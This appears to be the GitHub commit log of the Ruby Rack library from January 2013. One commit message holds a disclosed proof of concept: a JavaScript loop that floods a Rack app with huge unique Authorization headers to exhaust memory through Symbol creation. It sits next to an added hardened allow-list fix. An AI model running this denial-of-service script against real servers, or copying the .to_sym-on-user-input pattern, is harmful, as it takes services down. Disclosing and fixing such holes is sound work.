
Jan 22, 2013

  1. James Tucker

    Switch to RFC 2822 expires

    authored January 21, 2013

Jan 21, 2013

  1. James Tucker

    Fix a long standing misnomer for date formats

    References #414
    authored January 21, 2013
  2. James Tucker

    Use Dir.tmpdir instead of hardcoded /tmp

    Closes #492
    authored January 21, 2013
  3. James Tucker

    Don't modify the middleware hash in Rack::Server

     * Closes #498
    authored January 21, 2013
  4. James Tucker

    Merge pull request #496 from homakov/patch-3

    Remove never called string
    authored January 21, 2013

Jan 14, 2013

  1. Egor Homakov

    Remove never called string

    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
    authored January 14, 2013

Jan 13, 2013

  1. James Tucker

    Update to 1.5.0.beta.2

    authored January 13, 2013
  2. James Tucker

    Update README security notes

    authored January 13, 2013
  3. James Tucker

    Update README for release. Add security section.

    authored January 13, 2013
  4. James Tucker

    Rack::Auth::AbstractRequest#scheme returns strings

     * This is a breaking API change, but doesn't appear to be used in public
    authored January 13, 2013
  5. James Tucker

    Squash test warnings

    authored January 13, 2013
  6. James Tucker

    Turn warnings back on for basic test runs

    authored January 13, 2013
  7. James Tucker

    Squash warnings in spec_auth

    authored January 13, 2013
  8. James Tucker

    Reimplement auth scheme fix

     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - uses rails
     * Checked rack-authentication - does its own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does its own thing
     * Probably missed a bunch, but that'll have to do
    authored January 13, 2013
  9. James Tucker

    Revert "Merge pull request #494 from homakov/patch-2"

    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
    authored January 13, 2013
  10. Konstantin Haase

    Merge pull request #494 from homakov/patch-2

    Remove .to_sym in Authorization scheme
    authored January 13, 2013
  11. Egor Homakov

    Remove .to_sym in Authorization scheme

    Hello, `.to_sym` should never be applied to user input. Thus I recommend that you change the `scheme` method:
    ```ruby
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send an enormous amount of `Authorization` headers, we can make it as long as possible.
    This is a PoC. App (`config.ru`):
    ```ruby
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple Javascript to DoS it:
    ```javascript
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run the JS, every request carries 18888890 letters in a symbol. This 'data' will never be garbage collected.
    Should it be fixed?
    authored January 13, 2013
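
An added example (not Rack's own code) that puts the vulnerable `scheme` from the commit message above beside a hardened form modelled on the later "Rack::Auth::AbstractRequest#scheme returns strings" and "Reimplement auth scheme fix" commits: scheme names stay Strings and are checked against an allow-list that a registration method extends, in the spirit of `Rack::Auth.add_scheme`. The `SafeAuth` module name and the starting allow-list are assumptions.

```ruby
# Added example, not Rack's own code. The posted `scheme` interned
# attacker-controlled input with `.to_sym`; the hardened version keeps
# scheme names as Strings and accepts only a registered allow-list.
module SafeAuth
  # Assumed starting allow-list (Rack's real list lives in Rack::Auth).
  @schemes = %w[basic digest bearer]

  # Register an additional scheme name; the stored form is lowercase.
  def self.add_scheme(name)
    name = name.to_s.downcase
    @schemes << name unless @schemes.include?(name)
    name
  end

  def self.schemes
    @schemes.dup
  end

  # Vulnerable form from the commit message above: each distinct header
  # value becomes a new Symbol, which older Rubies never reclaim.
  def self.vulnerable_scheme(header)
    header.to_s.split(' ', 2).first.to_s.downcase.to_sym
  end

  # Hardened form: downcase the String and look it up in the allow-list.
  # Unknown or missing schemes return nil, so a flood of unique
  # Authorization values only creates short-lived Strings.
  def self.scheme(header)
    candidate = header.to_s.split(' ', 2).first.to_s.downcase
    @schemes.include?(candidate) ? candidate : nil
  end
end

if __FILE__ == $0
  # Constructed header in the shape used by the PoC: unique junk + " lol".
  junk = "\u0401aa0 lol"
  p SafeAuth.vulnerable_scheme(junk).class  # Symbol: the junk was interned
  p SafeAuth.scheme(junk)                   # nil: rejected, nothing interned
  p SafeAuth.scheme("Basic dXNlcjpwYXNz")   # "basic"
end
```

On Ruby 2.2 and later, symbols created by `to_sym` are garbage collected, but a fixed String allow-list still avoids unbounded symbol creation on older runtimes and rejects unknown schemes outright.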

Jan 11, 2013

  1. James Tucker

    Merge branch 'hijack'

    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
    authored January 11, 2013
  2. James Tucker

    Hijack SPEC changes after review discussion

    authored January 11, 2013
  3. James Tucker

    Add q-value helpers for Accept headers, etc.

     * Supersedes and closes #443
    authored January 11, 2013
  4. James Tucker

    Introduce Rack::Mime.match?, references #443

    authored January 11, 2013
  5. James Tucker

    Minor code review comments closing #451

     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
    authored January 11, 2013
  6. James Tucker

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    This reverts commit 3b24fa9.
    authored January 11, 2013
  7. James Tucker

    Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/…

    …rack into sendfile
    
    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compatibility
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
    authored January 11, 2013
  8. James Tucker

    Enable unix sockets with paths as trusted proxies

     * Supersedes and closes #488
    authored January 11, 2013
  9. James Tucker

    Merge pull request #491 from spastorino/allow_build_different_session…

    …_object
    
    Allow subclasses to build a different Session Object
    authored January 11, 2013
  10. Santiago Pastorino

    Allow subclasses to build a different Session Object

    authored January 11, 2013
  11. James Tucker

    Merge pull request #490 from slivu/master

    Added Reel Web Server and Espresso Framework to supported software list
    authored January 10, 2013
  12. James Tucker

    Merge pull request #489 from spastorino/abstract_id_tiny_patches

    Abstract id tiny patches
    authored January 10, 2013

Jan 10, 2013

  1. Update README.rdoc

    authored January 10, 2013
  2. Santiago Pastorino

    Fix current_session_id docs, id it's retrieved from SessionHash now

    authored January 10, 2013
  3. Santiago Pastorino

    Implement the ID API correctly

    authored January 10, 2013
  4. Santiago Pastorino

    Session is already loaded at this point

    authored January 10, 2013

Jan 09, 2013

  1. Santiago Pastorino

    Rename by to store to match better the purpose of that object

    authored January 09, 2013

Jan 07, 2013

  1. James Tucker

    Merge pull request #487 from carlosantoniodasilva/remove-warnings

    Remove warnings: 'not used variable' and 'shadowing outer variable'
    authored January 07, 2013